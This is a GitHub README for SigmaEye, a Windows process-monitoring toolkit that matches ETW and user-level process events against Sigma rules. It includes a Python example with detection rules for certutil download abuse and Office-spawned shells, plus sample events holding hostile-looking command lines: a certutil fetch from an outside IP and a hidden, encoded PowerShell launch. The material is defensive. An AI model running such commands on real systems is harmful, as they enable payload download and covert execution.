SigmaEye is a Windows process monitoring toolkit that integrates ETW and user-level monitoring with Sigma rules. It detects suspicious process behavior, LOLBins usage, and potential threats in real-time. Features include dual monitoring, DLL injection tracking, and customizable detection rules. Requires admin privileges for ETW monitoring.

petstuk/SigmaEye

Latest commit 3c4f9e1 · Feb 22, 2025 (7 commits)

SigmaEye

A Windows process monitoring toolkit that combines ETW (Event Tracing for Windows) and user-level monitoring capabilities with Sigma rules integration. SigmaEye provides real-time detection of suspicious process behavior, LOLBins usage, and potential threats.

Features

  • Dual Monitoring Capabilities

    • ETW Monitor (Admin required) for system-level visibility
    • User-level Process Monitor for non-privileged monitoring
  • Integrated Detection

    • Sigma rules integration
    • LOLBins (Living off the Land Binaries) detection
    • Suspicious process chain analysis
    • DLL injection monitoring
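
The detection features above (Sigma rule matching, LOLBin detection and parent/child process chain checks) come down to evaluating Sigma selections and conditions against process-creation events. The block below is an added example, not SigmaEye's code: it implements a small Sigma-style matcher for `process_creation` events and runs it over constructed Sysmon-style events. The two rules (a certutil `urlcache` download and an Office application spawning a shell) and the `\Tools\legit.ps1` allow-list filter are constructed for the example, and the rules are written as Python dicts with the same layout as Sigma YAML so the block runs without pyyaml; in a real pipeline they would come from `yaml.safe_load()` on the rule files.

```python
"""Sigma-style matching of Windows process_creation events (added example, not SigmaEye's code)."""
import fnmatch
import re
from typing import Any, Dict, List, Tuple

Event = Dict[str, Any]

# Constructed rule: certutil used as a LOLBin downloader. Same layout as the Sigma YAML.
RULE_CERTUTIL = {
    "title": "Certutil download via urlcache (constructed)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": r"\certutil.exe",
            "CommandLine|contains|all": ["urlcache", "http"],
        },
        "condition": "selection",
    },
    "level": "high",
}

# Constructed rule: Office parent spawning a shell (process chain check) with a hypothetical allow-list filter.
RULE_OFFICE_SHELL = {
    "title": "Office application spawning a shell (constructed)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection_parent": {"ParentImage|endswith": [r"\winword.exe", r"\excel.exe", r"\outlook.exe"]},
        "selection_child": {"Image|endswith": [r"\cmd.exe", r"\powershell.exe", r"\wscript.exe"]},
        "filter_known_addin": {"CommandLine|contains": r"\Tools\legit.ps1"},  # hypothetical allow-list entry
        "condition": "all of selection_* and not filter_known_addin",
    },
    "level": "high",
}
RULES = [RULE_CERTUTIL, RULE_OFFICE_SHELL]


def _match_value(value: Any, pattern: Any, modifiers: List[str]) -> bool:
    """Apply Sigma value modifiers to one field value (case-insensitive except for 're')."""
    if value is None:
        return False
    if "re" in modifiers:
        return re.search(str(pattern), str(value)) is not None
    val, pat = str(value).lower(), str(pattern).lower()
    if "contains" in modifiers:
        return pat in val
    if "startswith" in modifiers:
        return val.startswith(pat)
    if "endswith" in modifiers:
        return val.endswith(pat)
    return fnmatch.fnmatchcase(val, pat)  # plain values allow Sigma '*' / '?' wildcards


def _match_selection(selection: Any, event: Event) -> bool:
    """Keys of a selection map are ANDed; a list of values is ORed unless the '|all' modifier is set."""
    if isinstance(selection, list):  # a list of maps is an OR of maps
        return any(_match_selection(s, event) for s in selection)
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        values = patterns if isinstance(patterns, list) else [patterns]
        hits = [_match_value(event.get(field), p, modifiers) for p in values]
        if not (all(hits) if "all" in modifiers else any(hits)):
            return False
    return True


_OF_EXPR = re.compile(r"\b(1|all) of ([\w*]+)")


def _eval_condition(condition: str, results: Dict[str, bool]) -> bool:
    """Evaluate conditions such as 'sel and not filter', '1 of sel_*' or 'all of them'."""
    def expand(m):
        names = list(results) if m.group(2) == "them" else fnmatch.filter(list(results), m.group(2))
        if not names:
            return "False"
        return "(" + (" or " if m.group(1) == "1" else " and ").join(names) + ")"
    expr = _OF_EXPR.sub(expand, condition)
    # Rule text is trusted config, but it is still restricted to names, parentheses and whitespace
    # and evaluated with no builtins, so it can only refer to the selection results.
    if not re.fullmatch(r"[\w\s()]+", expr):
        raise ValueError("unsupported condition: %r" % condition)
    return bool(eval(expr, {"__builtins__": {}}, dict(results)))


def match_rule(rule: Dict[str, Any], event: Event) -> bool:
    """True when the rule's condition holds for this event."""
    detection = rule["detection"]
    results = {name: _match_selection(sel, event) for name, sel in detection.items() if name != "condition"}
    return _eval_condition(detection["condition"], results)


def run_rules(rules: List[Dict[str, Any]], events: List[Event]) -> List[Tuple[str, int]]:
    """Return (rule title, ProcessId) for every event/rule pair that fires, in event order."""
    return [(r["title"], ev["ProcessId"]) for ev in events for r in rules if match_rule(r, ev)]


# Constructed process_creation events, using the field names Sigma rules expect (Sysmon-style).
EVENTS: List[Event] = [
    {"ProcessId": 4100, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://198.51.100.7/p.txt p.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"ProcessId": 4212, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"ProcessId": 4300, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Temp\setup.msi SHA256",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": 4350, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Tools\legit.ps1",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
]

if __name__ == "__main__":
    for title, pid in run_rules(RULES, EVENTS):
        print("ALERT pid=%d rule=%s" % (pid, title))
```

Only the first two events fire: the hashfile use of certutil is benign LOLBin activity and is ignored by the `|all` modifier, and the Excel-spawned script hits the allow-list filter. Matching is case-insensitive, as Sigma specifies, which is why `WINWORD.EXE` matches `\winword.exe`; a matcher that compares case-sensitively will silently miss most Windows paths.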

Requirements

  • Python 3.6+
  • Windows Operating System
  • Administrator privileges (for ETW monitoring)

Python Dependencies

pip install pywin32 wmi pyyaml psutil

Installation

  1. Clone the repository:
git clone https://github.com/petstuk/SigmaEye
cd SigmaEye
  2. Install the required packages:
pip install -r requirements.txt
  3. Clone the Sigma rules (an older copy already exists in this repository; to update it, delete the existing sigma folder and clone the current rules with the command below):
git clone https://github.com/SigmaHQ/sigma.git
  4. Run either monitor:
# For the ETW Monitor (from an elevated prompt, since ETW sessions require administrator rights):
python3 etw_monitor.py

# For the User Process Monitor (no elevation needed):
python3 user_process_monitor.py

Configuration

The config.yaml file allows customization of:

  • LOLBins detection rules
  • Suspicious process patterns
  • DLL monitoring paths
  • Alert thresholds

Logging

  • ETW Monitor logs to etw_monitor.log
  • User Process Monitor creates logs in logs/ directory
  • Detailed JSON output for all alerts
  • Process relationship tracking

Contributing

Contributions welcome! Feel free to submit issues or pull requests.

License

MIT License
